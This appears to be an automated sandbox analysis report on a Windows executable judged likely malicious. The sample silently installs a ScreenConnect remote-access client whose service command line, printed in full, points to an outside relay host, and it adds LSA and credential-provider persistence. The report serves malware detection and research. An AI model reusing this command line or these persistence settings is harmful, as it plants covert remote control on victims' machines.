Analysis Overview
SHA256
5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3
Threat Level: Likely malicious
The file 5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe was found to be: Likely malicious.
Malicious Activity Summary
Sets service image path in registry
Executes dropped EXE
Event Triggered Execution: Component Object Model Hijacking
Loads dropped DLL
Checks computer location settings
Enumerates connected drives
Boot or Logon Autostart Execution: Authentication Package
Drops file in Windows directory
Drops file in Program Files directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Uses Volume Shadow Copy service COM API
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 17:06
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 17:06
Reported
2024-11-13 17:09
Platform
win10v2004-20241007-en
Max time kernel
111s
Max time network
140s
Command Line
Signatures
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (20ae101cef0f1acf)\ImagePath = "\"C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.ClientService.exe\" \"?e=Access&y=Guest&h=forcloud.xyz&p=8041&s=92e7fd01-fc29-45eb-8a0d-d62071f48800&k=BgIAAACkAABSU0ExAAgAAAEAAQChADX0VDCOYpzw3rHL2%2fWsmDfp2rMCOwlBz1eCGgD2Oi1gRuiacwZcRKSZxBYWgdfGxDbYoeGqdwtpMoqlG8JOF4ZKxVYt9zhvvQIB5ire7%2fRFo81g3%2b6hxkPJc0INqs%2bXruwq1z%2b6smxQSCBb%2fykHDHW7AhbHyK65sNB5aK02%2bPswsU904ncQII1vFx60s4CJ8ilr9kIfJWyMgG0RDnaKSCV6gAU5oDSV8wZ3CFUrC2FZNJ8A0Fkfb5xYiK39FBIivzP4vYfAruNnluqWCCrM3hrKooHc9G96dlUI6y4avh5vYzfNXEaIxQvrLqzjTpAdRhiVwzF5SgOywQIOk%2bC5&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAnoPzfbU0UESngtSsivoO5gAAAAACAAAAAAAQZgAAAAEAACAAAACMXUi7ETvxIB%2bqn0%2f4S0iNfqKstNOmK8Ytl0mIiAc5wAAAAAAOgAAAAAIAACAAAAAWpEL%2bTZN7p2UOT%2fi7hX4VRRV6qFZzedY0sji3HVAdpqAEAAD7aSvNJLP2ZQ6swvThoUS52GUH%2bUF9UIpZPvVglRWbjOXKtq3FqdZ0Qg%2fYtuEDhFLX2yCI4eUVbKjtG%2blhrt9nES5pa5XjHAKqrggXThuZCXqAnZjhJDySakpBIOoeBTCslxvDZBqNsqIVbUl5v%2fFAwPb4TWiThCQF6t1SnE3LDhCKe5ExVTUACx4DBhZpxSnokagxeOXZNY1FU7ymTz8fwOOAWZLQ6Xw%2fvEL6xjsYaWFSeZfrAWsrs8Prs7X005eTmWf77Q%2bTrzY5OA5WG%2fCQrVA%2fmL5l4EYdAyZwZsuD72uWuQGITDKLgegmsXVRmlX%2f9I9dcjcjgi4T5xhzVQH9ca6t%2fGwFRKtuj7RslmhMCEhLTe3%2fXtcsKrLnj0GOsVn0vA9jK4T%2b79nij%2b7Xmou8XaG3G5YGxcSvUbopu11X4Pj3tpgqz3cjY%2fYQAchy5YQFMR3n0ClhsGissNx0sYzpfxhUDOoZpG%2fGUGYnvUrf1UULm4%2fNuuJiV0KOicLLJcqEnKcV1oiR4k6IKgLe%2fu6%2fb%2fE0D%2foeUbzWnVw8f8%2bTe28t5GiIdduZ0TxtpNJObGbo4cYmSQQoskPyv%2fEIbfA2MT2IaRuTDlwQUpWZCv%2bGaOlXeoKXEmXkGHlq%2f6ym2xYBfCDWEPAwStn8vgJQQ0cmZX6xz%2fFSgUcd0NPJCqpp0kFtVvsVwnmHTxv7StgkiL33NYxYQZmjBOF4DcYBaZ8EUDwfk%2b%2f7cWLcUnrBkdeju1voWqaLga%2frU%2foPgW2%2b10aJofoLcwdtHG%2fipG9tA4K1CnfP9Pqm%2bQmtMMWt8g3SWyBRZZjfKiErFi7Q0GN9PQheK9gaMVFlisKGMvLBU4WZXSu7vmIh4kunw3Jj1Dc5WPxmwtUo%2bkcdCAAzFwRjbPHXvAafCeXIQUMdPz5GXQvq6RAXOqJPJuK2fx0M6HtdVwAFuMrEFG4cpgx%2bN6Uawns%2bMftnROnGB9VHr0J%2fcWixSmpfIisvg9BoSq2gT%2b3%2bFLpiN33h6ipP4PGOkCMeA8xVGghaqFtyyeW1BU1zVOZmwaLQ1t42ARQ5EFxbiFOSzrjByEcAD%2fFAPo3IXfE22nv7OaCW2mIjOSbjCycp2EyB1arYek%2bZcZ3nHMX77RKK8ZcTaBDBdVUMYZym7NOkjwUn3jyG2zRzT%2bZPyt0frEOqgjafpgvMJ5RhgjlaRGy%2fOWOMGa%2flgsAS9mxIFdFeR4cQlqfzdbjd%2fc2vJn%2fcikNtbwtt7csWOFpTXeD5s2L%2fZJr2Pd0%2bN12ysbuTkhHkSU78FpB%2fwmzOzFx9DwmSZEMtW%2bJzQCI2VcA%2bbGenbiZhzKtDkNpWLlyqkUkRC5CHoMAUG7M2RX9ZNtZu2ibEqHZ6ib1kgOLVykT3CyatN%2bPvtDRkxgo32Ll994NOA7hmBPmJMydHJKnBTfavNV7yXqG9lj9ClHU4C%2bEsbcrtnDt5wJH9cAzgoNiTWlfC9Z55sn%2bPhwoGxYXna4Uo88%2b0l9hbBKiG0sX87Fs6EQCqdM9cJ8bJQSsji1427sZs%2fJ0%2bapcgu3X1dQPLJJRA%2fZyS930D5qdAd0uRs1DwWtI4JIuLZUAAAAAHwzA80IduPMKF5viypC0RW9XUib4Dgd0qcpeUKvpEMTdH%2b9Y%2b4A5MJC2MH1agmEObt4M0YDlW2%2blt1zwcvvML&t=JacekK&c=PL&c=&c=&c=&c=&c=&c=&c=\"" | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe | N/A |
Event Triggered Execution: Component Object Model Hijacking
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe | N/A |
Loads dropped DLL
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
Boot or Logon Autostart Execution: Authentication Package
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800320030006100650031003000310063006500660030006600310061006300660029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.en-US.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\system.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\app.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.resources | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe.config | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSIFD1E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\wix{27FF5BC2-C647-2B99-83BE-DDEA87E94140}.SchedServiceConfig.rmi | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\Installer\e57fbb7.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\DefaultIcon | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e57fbb5.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e57fbb5.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFCCF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI136.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{27FF5BC2-C647-2B99-83BE-DDEA87E94140} | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000009fc5eef0dbaffe7c0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800009fc5eef00000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809009fc5eef0000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d9fc5eef0000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000009fc5eef000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 | C:\Windows\system32\msiexec.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.WindowsClient.exe\" \"%1\"" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\2CB5FF72746C99B238EBDDAE789E1404 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\B13434442C21EB3002EA01C1FEF0A1FC\2CB5FF72746C99B238EBDDAE789E1404 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\ = "ScreenConnect Client (20ae101cef0f1acf) Credential Provider" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Version = "402718729" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\ProductIcon = "C:\\Windows\\Installer\\{27FF5BC2-C647-2B99-83BE-DDEA87E94140}\\DefaultIcon" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\PackageName = "setup.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F} | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\PackageCode = "2CB5FF72746C99B238EBDDAE789E1404" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (20ae101cef0f1acf)\\ScreenConnect.WindowsCredentialProvider.dll" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\B13434442C21EB3002EA01C1FEF0A1FC | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\URL Protocol | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\UseOriginalUrlEncoding = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-20ae101cef0f1acf\shell\open\command | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\20ae101cef0f1acf\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A44D-4392D823459F}\InprocServer32 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\2CB5FF72746C99B238EBDDAE789E1404\Full | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\20ae101cef0f1acf\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-20ae101cef0f1acf | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-20ae101cef0f1acf\shell\open\command | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\ProductName = "ScreenConnect Client (20ae101cef0f1acf)" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CB5FF72746C99B238EBDDAE789E1404\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\5c0bf98f428ac235e9ed18951af08b5da721d7f1074097544ffbc55b9c51d6b3.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
